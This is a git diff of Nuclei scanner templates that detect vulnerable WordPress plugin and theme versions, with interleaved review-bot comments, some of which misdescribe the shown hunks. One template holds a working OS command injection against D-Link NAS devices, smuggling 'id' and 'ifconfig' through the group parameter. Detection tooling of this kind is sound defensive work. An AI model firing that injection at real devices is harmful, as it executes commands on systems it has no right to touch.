+ The WP on AWS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_POST data in all versions up to, and including, 5.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c82dc37-0b9a-48c2-a8a6-fbee6182003f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-12408
+ metadata:
+ fofa-query: "wp-content/plugins/wp-migrate-2-aws/"
+ google-query: inurl:"/wp-content/plugins/wp-migrate-2-aws/"
+ shodan-query: 'vuln:CVE-2024-12408'
+ tags: cve,wordpress,wp-plugin,wp-migrate-2-aws,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-migrate-2-aws/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-migrate-2-aws"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12502-165e0e004bfa0e15f19fa07916376304.yaml b/poc/cve/CVE-2024-12502-165e0e004bfa0e15f19fa07916376304.yaml
new file mode 100644
index 0000000000..5854e8e63d
--- /dev/null
+++ b/poc/cve/CVE-2024-12502-165e0e004bfa0e15f19fa07916376304.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12502-165e0e004bfa0e15f19fa07916376304
+
+info:
+ name: >
+ My IDX Home Search <= 2.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The My IDX Home Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'homeasap-idx-landing' shortcode in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d17aca2b-5ac6-46cd-a439-f492e6573a46?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-12502
+ metadata:
+ fofa-query: "wp-content/plugins/my-idx-home-search/"
+ google-query: inurl:"/wp-content/plugins/my-idx-home-search/"
+ shodan-query: 'vuln:CVE-2024-12502'
+ tags: cve,wordpress,wp-plugin,my-idx-home-search,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/my-idx-home-search/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "my-idx-home-search"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12558.yaml b/poc/cve/CVE-2024-12558.yaml
new file mode 100644
index 0000000000..15b09e8482
--- /dev/null
+++ b/poc/cve/CVE-2024-12558.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12558-027030512640daa77ea3d82e9a1d2312
+
+info:
+ name: >
+ WP BASE Booking of Appointments, Services and Events <= 4.9.2 - Missing Authorization to Authenticated (Subscriber+) Sensitive Information Exposure via app_export_db
+ author: topscoder
+ severity: low
+ description: >
+ The WP BASE Booking of Appointments, Services and Events plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_db function in all versions up to, and including, 4.9.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to expose sensitive information from the database, such as the hashed administrator password.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/09831b2f-8f79-4833-8fc6-f1af56c6abc8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-12558
+ metadata:
+ fofa-query: "wp-content/plugins/wp-base-booking-of-appointments-services-and-events/"
+ google-query: inurl:"/wp-content/plugins/wp-base-booking-of-appointments-services-and-events/"
+ shodan-query: 'vuln:CVE-2024-12558'
+ tags: cve,wordpress,wp-plugin,wp-base-booking-of-appointments-services-and-events,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-base-booking-of-appointments-services-and-events/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-base-booking-of-appointments-services-and-events"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.9.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12588.yaml b/poc/cve/CVE-2024-12588.yaml
new file mode 100644
index 0000000000..96853294d9
--- /dev/null
+++ b/poc/cve/CVE-2024-12588.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12588-74fdbee90e8f1569c31b65ae5ac69c79
+
+info:
+ name: >
+ Shortcodes and extra features for Phlox theme <= 2.16.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Staff Widget
+ author: topscoder
+ severity: low
+ description: >
+ The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Staff widget in all versions up to, and including, 2.16.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/766cb6d0-1839-4d8c-819c-4e5dab408f6c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-12588
+ metadata:
+ fofa-query: "wp-content/plugins/auxin-elements/"
+ google-query: inurl:"/wp-content/plugins/auxin-elements/"
+ shodan-query: 'vuln:CVE-2024-12588'
+ tags: cve,wordpress,wp-plugin,auxin-elements,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/auxin-elements/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "auxin-elements"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.16.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12591.yaml b/poc/cve/CVE-2024-12591.yaml
new file mode 100644
index 0000000000..fd388e04ff
--- /dev/null
+++ b/poc/cve/CVE-2024-12591.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12591-2661762fc85d1a9540507c69b111201b
+
+info:
+ name: >
+ MagicPost <= 1.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via wb_share_social Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The MagicPost plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wb_share_social shortcode in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f81355fa-5b12-4b03-bd3d-f9e2cb734390?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-12591
+ metadata:
+ fofa-query: "wp-content/plugins/magicpost/"
+ google-query: inurl:"/wp-content/plugins/magicpost/"
+ shodan-query: 'vuln:CVE-2024-12591'
+ tags: cve,wordpress,wp-plugin,magicpost,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/magicpost/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "magicpost"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12635.yaml b/poc/cve/CVE-2024-12635.yaml
new file mode 100644
index 0000000000..c192e91704
--- /dev/null
+++ b/poc/cve/CVE-2024-12635.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12635-092a05628ca831a1bb9c607c24d54577
+
+info:
+ name: >
+ WP Docs <= 2.2.0 - Authenticated (Subscriber+) Time-Based SQL Injection via 'dir_id'
+ author: topscoder
+ severity: low
+ description: >
+ The WP Docs plugin for WordPress is vulnerable to time-based SQL Injection via the 'dir_id' parameter in all versions up to, and including, 2.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The vulnerability was partially patched in version 2.2.0.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cbbfe66-09fe-48c9-9af1-0b7b90ac222a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-12635
+ metadata:
+ fofa-query: "wp-content/plugins/wp-docs/"
+ google-query: inurl:"/wp-content/plugins/wp-docs/"
+ shodan-query: 'vuln:CVE-2024-12635'
+ tags: cve,wordpress,wp-plugin,wp-docs,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-docs/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-docs"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12697.yaml b/poc/cve/CVE-2024-12697.yaml
new file mode 100644
index 0000000000..c57d49450d
--- /dev/null
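Review bot: The description ends with "The vulnerability was partially patched in version 2.2.0" while the DSL bound `compare_versions(version, '<= 2.2.0')` still reports 2.2.0 as vulnerable; that agrees with the "up to, and including, 2.2.0" wording earlier in the same text, but a reader comparing the two sentences cannot tell whether flagging 2.2.0 is intended or an off-by-one. A comment above the matcher, `# 2.2.0 is included on purpose: the advisory calls its fix partial`, would settle it if that is the intent; if it is not, tighten the bound to `compare_versions(version, '< 2.2.0')`.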
+++ b/poc/cve/CVE-2024-12697.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12697-8db77733a75f37172aa83e4825bd6e85
+
+info:
+ name: >
+ real.Kit <= 5.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The real.Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/83e1f631-28ec-4924-9d69-caaba00fe276?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-12697
+ metadata:
+ fofa-query: "wp-content/plugins/real-kit/"
+ google-query: inurl:"/wp-content/plugins/real-kit/"
+ shodan-query: 'vuln:CVE-2024-12697'
+ tags: cve,wordpress,wp-plugin,real-kit,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/real-kit/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "real-kit"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12721.yaml b/poc/cve/CVE-2024-12721.yaml
new file mode 100644
index 0000000000..f8505eccd8
--- /dev/null
+++ b/poc/cve/CVE-2024-12721.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12721-e696c3790eb4b1341769185b659235b2
+
+info:
+ name: >
+ Custom Product Tabs For WooCommerce <= 1.2.4 - Authenticated (Shop Manager+) PHP Object Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Custom Product Tabs For WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.4 via deserialization of untrusted input from the 'wb_custom_tabs' parameter. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3fdc6a04-ef39-498a-b739-f40d5d8af47e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2024-12721
+ metadata:
+ fofa-query: "wp-content/plugins/wb-custom-product-tabs-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/wb-custom-product-tabs-for-woocommerce/"
+ shodan-query: 'vuln:CVE-2024-12721'
+ tags: cve,wordpress,wp-plugin,wb-custom-product-tabs-for-woocommerce,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wb-custom-product-tabs-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wb-custom-product-tabs-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12771.yaml b/poc/cve/CVE-2024-12771.yaml
new file mode 100644
index 0000000000..0bd024c248
--- /dev/null
+++ b/poc/cve/CVE-2024-12771.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-12771-cd6721ae7264b86b9c92e3b0360445d3 + +info: + name: > + eCommerce Product Catalog Plugin for WordPress <= 3.3.43 - Cross-Site Request Forgery to Password Reset + author: topscoder + severity: medium + description: > + The eCommerce Product Catalog Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.3.43. This is due to missing or incorrect nonce validation on the 'customer_panel_password_reset' function. This makes it possible for unauthenticated attackers to reset the password of any administrator or customer account via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3513ec24-0b1b-4528-9f89-eee5654e4e98?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-12771 + metadata: + fofa-query: "wp-content/plugins/ecommerce-product-catalog/" + google-query: inurl:"/wp-content/plugins/ecommerce-product-catalog/" + shodan-query: 'vuln:CVE-2024-12771' + tags: cve,wordpress,wp-plugin,ecommerce-product-catalog,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ecommerce-product-catalog/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ecommerce-product-catalog" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.43') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-12875.yaml b/poc/cve/CVE-2024-12875.yaml new file mode 100644 index 0000000000..8c67970045 --- /dev/null +++ b/poc/cve/CVE-2024-12875.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12875-fdfbb98d9e9a1f9c1127b7881e3d0e1b + +info: + name: > + Easy Digital Downloads <= 3.3.2 - Authenticated (Admin+) Arbitrary File Download + author: topscoder + severity: low + description: > + The Easy Digital Downloads – eCommerce Payments and Subscriptions made easy plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3.2 via the file download functionality. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec065da7-b8aa-414d-9673-5caf87ad45b5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-12875 + metadata: + fofa-query: "wp-content/plugins/easy-digital-downloads/" + google-query: inurl:"/wp-content/plugins/easy-digital-downloads/" + shodan-query: 'vuln:CVE-2024-12875' + tags: cve,wordpress,wp-plugin,easy-digital-downloads,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-digital-downloads/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-digital-downloads" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9545.yaml b/poc/cve/CVE-2024-9545.yaml new file mode 100644 index 0000000000..b26dd7f37b --- /dev/null +++ b/poc/cve/CVE-2024-9545.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9545-383a080b0508dbca93fe0cae0c28ae26 + +info: + name: > + Shortcodes and extra features for Phlox theme <= 2.16.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via aux_contact_box and aux_gmaps Shortcodes + author: topscoder + severity: low + description: > + The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's aux_contact_box and aux_gmaps shortcodes in all versions up to, and including, 2.16.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/65ee0ac8-3fa0-4a7d-a786-36a914242634?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9545 + metadata: + fofa-query: "wp-content/plugins/auxin-elements/" + google-query: inurl:"/wp-content/plugins/auxin-elements/" + shodan-query: 'vuln:CVE-2024-9545' + tags: cve,wordpress,wp-plugin,auxin-elements,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/auxin-elements/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "auxin-elements" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.16.4') \ No newline at end of file 
diff --git a/poc/injection/Command-Injection.yaml b/poc/injection/Command-Injection.yaml new file mode 100644 index 0000000000..e55b49fd14 --- /dev/null +++ b/poc/injection/Command-Injection.yaml 
@@ -0,0 +1,55 @@ +id: CVE-2024-10915 + +info: + name: D-Link NAS - Command Injection via Group Parameter + author: s4e-io + severity: critical + description: | + A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been rated as critical. Affected by this issue is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument group leads to os command injection. + reference: + - https://www.usom.gov.tr/bildirim/tr-24-1836 + - https://netsecfish.notion.site/Command-Injection-Vulnerability-in-group-parameter-for-D-Link-NAS-12d6b683e67c803fa1a0c0d236c9a4c5?pvs=4 + - https://nvd.nist.gov/vuln/detail/CVE-2024-10915 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-10915 + cwe-id: CWE-78,CWE-707 + epss-score: 0.0408 + epss-percentile: 0.92375 + cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: dlink + product: dns-320_firmware + shodan-query: http.html:"sharecenter" + fofa-query: body="sharecenter" + tags: cve,cve2024,dlink,sharecenter,rce + +http: + - raw: + - | + GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;{{command}};%27 HTTP/1.1 + Host: {{Hostname}} + + payloads: + command: + - "id" + - "ifconfig" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)" + - "contains_all(body, 'inet addr:', 'Mask:')" + condition: or + + - type: dsl + dsl: + - 'contains(body, "Content-type: text/html")' + - "status_code == 200" + condition: and +# digest: 4b0a00483046022100bbc4e26d910b3948b3e37bbd063882ae16a09988e6798da089e5bd006f1ff7ed022100ee3139d82637396d87421c0e84185377ae8f02bfdd6e4897ba7b6c9646708aaa:922c64590222798bb761d5b6d8e72950 
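Review bot: The template `id: CVE-2024-10915` does not match the file name `Command-Injection.yaml`; every other file in this commit is named after its id, and a generic name in `poc/injection/` will collide with the next command-injection template added there. `tags` should also signal that this check executes OS commands (`id`, `ifconfig`) on the target rather than only reading a version string, e.g. `tags: cve,cve2024,dlink,sharecenter,rce,intrusive`, so operators can exclude it from non-intrusive runs. The trailing `# digest:` line appears to be the upstream signing digest over the template body; any edit to `id` or `tags` will invalidate it, so it should be regenerated or removed rather than left stale. The `[0-9(a-z)]` character class in the first DSL regex also includes the literal parentheses, which looks unintended.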
diff --git a/poc/microsoft/smsa-shipping-official.yaml b/poc/microsoft/smsa-shipping-official.yaml new file mode 100644 index 0000000000..55a36a7081 --- /dev/null +++ b/poc/microsoft/smsa-shipping-official.yaml @@ -0,0 +1,59 @@ +id: smsa-shipping-official-f19b56a54562a16962217b4283cfecb5 + +info: + name: > + SMSA Shipping(official) <= 2.2 - Authenticated (Subscriber+) Arbitrary File Deletion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/29d72347-ba49-45c6-a964-2c75064ac866?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/smsa-shipping-official/" + google-query: inurl:"/wp-content/plugins/smsa-shipping-official/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,smsa-shipping-official,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/smsa-shipping-official/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "smsa-shipping-official" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2') \ No newline at end of file diff --git a/poc/other/adforest.yaml b/poc/other/adforest.yaml new file mode 100644 index 0000000000..f96302da10 --- /dev/null +++ b/poc/other/adforest.yaml 
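Review bot: `cvss-metrics:`, `cvss-score:` and `cve-id:` are bare keys and parse as null, and `description: >` has no body, so this template carries no classification while its `tags` still claim `cve`; either fill these from the referenced Wordfence entry or drop the empty keys and the `cve` tag. `shodan-query: 'vuln:'` is likewise an empty stub query and should be removed. Placing a WordPress plugin template under `poc/microsoft/` looks like a misclassification by the directory-sorting step. The same empty stubs appear in the adforest, bdthemes-element-pack-lite, full-screen-menu-for-elementor, magicpost, pingmeter-uptime-monitoring, woo-one-click-upsell-funnel, wb-custom-product-tabs-for-woocommerce, gwebpro-store-locator and wp-migrate-2-aws hunks, all of which reference `?source=api-scan` rather than `api-prod` and so may be unreviewed imports.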
@@ -0,0 +1,59 @@ +id: adforest-e83f34353ce1bb79d2c778a1988f4ca8 + +info: + name: > + AdForest <= 5.1.6 - Authentication Bypass + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f374b3d1-820b-473f-8d2b-c3267e6d23d9?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/adforest/" + google-query: inurl:"/wp-content/themes/adforest/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,adforest,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/adforest/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "adforest" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.1.6') \ No newline at end of file diff --git a/poc/other/bdthemes-element-pack-lite-ef972b4a35b32092eeac378b1e4501b8.yaml b/poc/other/bdthemes-element-pack-lite-ef972b4a35b32092eeac378b1e4501b8.yaml new file mode 100644 index 0000000000..368bdff54d --- /dev/null +++ b/poc/other/bdthemes-element-pack-lite-ef972b4a35b32092eeac378b1e4501b8.yaml 
